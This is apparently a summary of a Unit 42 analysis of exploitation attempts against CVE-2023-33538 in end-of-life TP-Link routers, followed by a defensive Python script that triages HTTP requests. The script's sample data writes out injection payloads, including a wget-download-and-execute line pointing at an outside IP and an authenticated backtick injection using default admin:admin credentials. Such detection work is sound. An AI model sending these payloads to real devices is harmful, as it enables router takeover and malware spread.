Unit 42 researchers investigated active exploitation attempts targeting CVE-2023-33538, a command injection vulnerability in end-of-life TP-Link routers (TL-WR940N, TL-WR740N, TL-WR841N). Using firmware emulation and reverse engineering of the httpd binary, they confirmed the vulnerability is real but found the in-the-wild attacks were flawed in three ways: the attackers targeted the wrong parameter (ssid instead of the vulnerable ssid1), sent the request without authenticating, and relied on wget, which is absent from the firmware's limited BusyBox environment. The researchers confirmed that authenticated exploitation via the ssid1 parameter does work, and that the default credentials (admin:admin) make the authentication step trivial. The Mirai variant they analyzed (an arm7 binary) accepts C2 commands, updates itself with builds for multiple CPU architectures, and can turn an infected device into an HTTP server that distributes the malware to further victims. TP-Link confirmed that no patches will be issued for these end-of-life devices and recommends replacing them.
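The three defects in the observed attacks (wrong parameter, no authentication, dependence on wget) are also the indicators a defender can key on when triaging requests to one of these routers. The following script is an added example, not code from the Unit 42 article or from TP-Link: it parses raw HTTP requests, extracts the ssid/ssid1 parameters, checks for shell metacharacters, decodes any HTTP Basic credentials, and labels the attempt as likely ineffective or likely effective using exactly those indicators. The sample requests are constructed, and the request path (/userRpm/WlanNetworkRpm.htm), the use of HTTP Basic authentication, and the GET-query encoding of the parameters are assumptions for illustration; the article only identifies the parameter names, the missing authentication, the absence of wget, and the admin:admin default.

```python
"""Triage HTTP requests aimed at the TP-Link ssid/ssid1 command injection
(CVE-2023-33538) using the failure indicators Unit 42 reported: wrong
parameter, missing authentication, and reliance on wget.
Example code, not from the article; paths and auth scheme are assumptions."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that turn a parameter value into an injected command.
INJECTION_RE = re.compile(r"[;|`\n]|\$\(|&&|\|\|")
# Default credentials the article reports for these devices.
DEFAULT_CREDS = ("admin", "admin")

# Constructed sample requests (not real telemetry). The path and the use of
# HTTP Basic auth are assumptions made for this example.
SAMPLE_REQUESTS = [
    # 1: resembles the observed attacks: ssid (not ssid1), no auth, wget.
    "GET /userRpm/WlanNetworkRpm.htm?ssid=x;wget%20http://198.51.100.7/arm7"
    "%20-O%20/tmp/a;sh%20/tmp/a HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
    # 2: ssid1, authenticated with admin:admin, no wget dependency.
    "GET /userRpm/WlanNetworkRpm.htm?ssid1=x%60id%60 HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n",
    # 3: an ordinary, benign settings change.
    "GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNet HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Parse a raw HTTP/1.x request into method, path, parameters and headers."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    # Form-encoded POST bodies carry parameters too; merge them in.
    if method == "POST" and "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return {"method": method, "path": parts.path, "params": params, "headers": headers}


def basic_auth_credentials(headers: dict):
    """Return (user, password) from an HTTP Basic Authorization header, else None."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(auth.split(None, 1)[1]).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, password = decoded.partition(":")
    return (user, password)


def triage(raw: str) -> dict:
    """Classify one request against the three indicators from the article."""
    req = parse_request(raw)
    injected = {
        name: value
        for name in ("ssid", "ssid1")
        for value in req["params"].get(name, [])
        if INJECTION_RE.search(value)
    }
    creds = basic_auth_credentials(req["headers"])
    if not injected:
        return {"verdict": "no injection", "reasons": [], "default_creds": creds == DEFAULT_CREDS}
    payload = " ".join(injected.values())
    reasons = []
    if "ssid1" not in injected:
        reasons.append("wrong parameter: ssid instead of ssid1")
    if creds is None:
        reasons.append("no authentication")
    if re.search(r"\bwget\b", payload):
        reasons.append("uses wget, which the firmware's BusyBox lacks")
    verdict = "likely ineffective" if reasons else "likely effective"
    return {"verdict": verdict, "reasons": reasons, "default_creds": creds == DEFAULT_CREDS, "payload": payload}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(triage(raw))
```

Running the script prints one verdict per sample: the first is flagged as likely ineffective with all three reasons, the second as likely effective with default credentials in use, and the third as carrying no injection. The "likely effective" label should still be treated as a strong alert rather than proof of compromise; the only real test is the device itself, which on this hardware means replacement rather than patching.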

19m read time. From unit42.paloaltonetworks.com

Table of contents:
Our Telemetry Findings
Malware Downloaded
CVE-2023-33538 Exploit Analysis
